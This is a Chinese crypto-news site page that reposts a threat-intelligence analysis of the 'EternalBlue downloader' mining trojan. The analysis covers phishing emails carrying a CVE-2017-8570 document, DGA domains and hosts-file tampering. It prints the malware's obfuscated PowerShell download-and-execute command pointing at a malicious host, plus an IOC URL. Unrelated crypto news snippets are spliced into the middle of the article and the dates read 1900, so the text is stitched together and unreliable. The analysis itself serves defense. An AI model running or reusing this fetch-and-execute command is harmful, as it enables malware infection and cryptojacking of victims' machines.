比特幣交易所 比特幣交易所
Ctrl+D 比特幣交易所
ads
首頁 > TRX > Info

“永恒之藍下載器木馬”新增釣魚郵件傳播,利用用戶機器挖礦門羅幣_SHE

Author:

Time:1900/1/1 0:00:00

來源:騰訊御見威脅情報中心

編者注:原標題為《“永恒之藍下載器木馬”新增釣魚郵件傳播,附件含CVE-2017-8570漏洞攻擊代碼》

“永恒之藍”下載器木馬在感染用戶機器上運行后,會自動當前用戶的郵箱通訊錄并發送附件為urgent.doc的文檔,該文檔附帶CVE-2017-8570漏洞攻擊代碼。

如果被攻擊用戶收到郵件并不慎打開文檔,就可能觸發漏洞執行Powershell命令下載mail.jsp:

OPNX治理代幣OX質押服務在DeBank上線:金色財經報道,據三箭資本創始人Zhu Su等人創辦的加密索賠和交易平臺Open Exchange(OPNX)官推發布信息,其治理代幣OX的質押服務已在DeBank上線。OX允許用戶通過質押以免費交易,其中如果交易者所持有的OX總量占比等于或大于其OPNX交易總量占比,則可獲得100%的交易費用返還,超出免費交易額度的質押者將在剩余部分上獲得50%的交易費用返還,所有交易費用返利都以OX形式支付給持幣用戶。[2023/6/10 21:28:37]

C:/Windows/System32/cmd.exe/cpowershellIE`x(Ne`w-Obj`ectNet.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)

Bitfinex比特幣永續合約短時上漲至56500美元附近,隨后回落至正常區間:金色財經報道,北京時間 22:20 左右,加密交易所 Bitfinex 的比特幣永續合約價格短時拉升至 56500 美元附近,隨后回落至 28300 美元左右。[2023/5/3 14:39:19]

而下載使用的域名ap35nf7.jp實際上并沒有注冊,但是依然能夠解析到地址:t.awcna.com,是因為被感染機器的本地hosts文件被篡改,使得隨機生成的域名映射到木馬使用的惡意地址,細節請參考御見威脅情報中心此前發布的報告:《“永恒之藍下載器”木馬篡改hosts指向隨機域名,再用多個漏洞攻擊內網挖礦》。

Web3應用程序開發平臺Bunzz完成450萬美元種子輪融資,gjmp等參投:1月25日消息,Web3去中心化應用程序開發平臺Bunzz宣布完成450萬美元種子輪融資,gjmp、DGDaiwa Ventures、Coincheck和Ceres參投。

據悉,Bunzz平臺利用模塊化節點封裝和開發環境已經吸引了超過8000名開發人員推出超過3000個上鏈dApp項目,該公司透露將利用新資金構建一個智能合約中心以提高Web3關鍵基礎設施服務。[2023/1/25 11:29:53]

本次攻擊過程中,木馬將使用隨機生成的字符加“.cn”或”.jp“或”.kr“后綴作為DGA域名,并在hosts文件中指向域名:

t.tr2q.com,t.awcna.com,t.amynx.com

mail.jsp經過高度混淆,多次解密后可以看到其安裝多個計劃任務下載Powershell腳本執行,并使用了新的計劃任務名:

“Bluetea“藍茶。

“永恒之藍”下載器木馬自出現之后從未停止更新,從最初的PE樣本攻擊到后來轉移為以Powershell無文件攻擊方式躲避查殺,并且通過安裝多個類型的計劃任務進行持久化。在傳播方式上,最初通過供應鏈攻擊積累一批感染機器后,又不斷利用”永恒之藍”漏洞,MSSql爆破,$IPC爆破,RDP爆破等方法進行擴散傳播,近期又增加了DGA域名攻擊和釣魚郵件攻擊,其最終目的只為利用用戶機器挖礦門羅幣獲利。

永恒之藍下載器木馬的歷次版本更新參考下表:

安全建議

1.建議用戶不要輕易打開不明來源的郵件附件,對于郵件附件中的文件要格外謹慎運行,如發現有腳本或其他可執行文件可先使用殺軟件進行掃描;

2.服務器使用安全的密碼策略,特別是IPC$、MSSQL、RDP賬號密碼,切勿使用弱口令,避免遭遇弱密碼爆破攻擊;

3.根據微軟安全公告及時修復Office漏洞CVE-2017-8570,需進行漏洞掃描和修復,或采用WindowsUpdate進行。

IOCs

http//t.awcna.com/mail.jsp

Tags:COMMAIHELSHEfurucombo幣GYMAI價格Hello Art TokenSHEEB幣

TRX
詹姆斯·邦德也發幣?明星發幣無一成功,幣價跌去99.95%_比特幣

文:棘輪比薩 來源:一本區塊鏈 “007發幣了!”日前,007電影中詹姆斯·邦德的飾演者丹尼爾·克雷格“發幣”的傳言,廣為傳播。實際上,這是一個疑似資金盤的項目假借克雷格名義做的虛假廣告.

1900/1/1 0:00:00
五問新基建:區塊鏈角色重要,投資體量不足_區塊鏈

文/王巧 編輯/獨秀 3月初,中央局常務委員會提出“加快推進國家規劃已明確的重大工程和基礎設施建設,加快5G網絡、數據中心等新型基礎設施建設進度”,“新基建”成為今年的發展主旋律.

1900/1/1 0:00:00
觀點:比特幣只能用來應對一種特殊的危機,那就是法幣系統的潛在崩潰_RNS

來源:LongHash 編者注:原標題為《觀點:比特幣不是新冠肺炎的避風港,而是法幣的避風港》在2019年,很多人認為比特幣是一種“避風港資產”。然而,到了2020年這個“避風港”已經失職.

1900/1/1 0:00:00
觀點:比特幣是草根“降維逆襲”的唯一手段_ETH

來源:區塊印象 編者注:原標題為《比特幣是屌絲“降維逆襲”的唯一手段》在知乎上看到一個挺有趣的話題:我們為什么在幾年之后才聽說比特幣.

1900/1/1 0:00:00
市場臨近“爆破”邊緣,比特幣將輕松重返8000美元?_NFT

本文來源:小蔥區塊鏈,原題《壓抑情緒瀕臨爆發半月前劇本將鏡像重演?》,有刪減主流幣種的沉悶表現在今日早盤有所改觀,不過大多數幣種仍然沒有能夠擺脫最近一段時間橫盤震蕩所處的狹窄區間.

1900/1/1 0:00:00
巴比特專欄 | 股票向內,通證向外_GAM

一、前言 通證是區塊鏈領域一個非常有意思的東西,可以說正是因為有通證的存在,目前我們區塊鏈行業才看起來像一個有規模行業,因為現在區塊鏈的參與者人數已經不算少了.

1900/1/1 0:00:00
ads